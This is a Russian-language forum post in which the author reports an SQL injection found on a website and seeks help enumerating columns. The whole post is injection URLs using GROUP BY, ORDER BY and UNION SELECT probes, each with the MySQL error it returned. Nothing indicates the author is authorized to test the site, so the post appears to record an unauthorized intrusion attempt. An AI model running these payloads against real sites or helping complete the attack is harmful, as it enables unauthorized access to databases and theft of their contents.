Нашел на сайте SQL Injection:

http://site.ru/search/?num=13750-01a'

с такой ошибкой:

Database error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1

но не могу определить количество столбцов. Через GROUP BYопределить никак не получается. Делал так:

http://site.ru/search/?num=13750-01a' GROUP BY 2 --

Database error:Unknown column '2' in 'group statement'

если выводится такая ошибка, значит количество столбцов меньше 2, что странно. Естественно далее делаю так:

http://site.ru/search/?num=13750-01a' GROUP BY 1 --

Database error:Can't group on 'cnt'

что за ошибка такая? Гугл не помог.

А вотORDER BYработает немного по другому:

http://site.ru/search/?num=13750-01a' ORDER BY 2 --

Database error:Unknown column '2' in 'order clause'

тут все как и в первом случае. А если сделать так:

http://site.ru/search/?num=13750-01a' ORDER BY 1 --

то никаких ошибок нет и все отображается нормально, в отличии от первого варианта сGROUP BY.

И чтобы окончательно убедиться делал так:

http://site.ru/search/?num=13750-01a' UNION SELECT 1 --

Database error:The used SELECT statements have a different number of columns

причем пробовал указывать вUNION SELECTнесколько столбцов, вплоть до 10, но ошибка не меняется.

В общем, требуется помощь.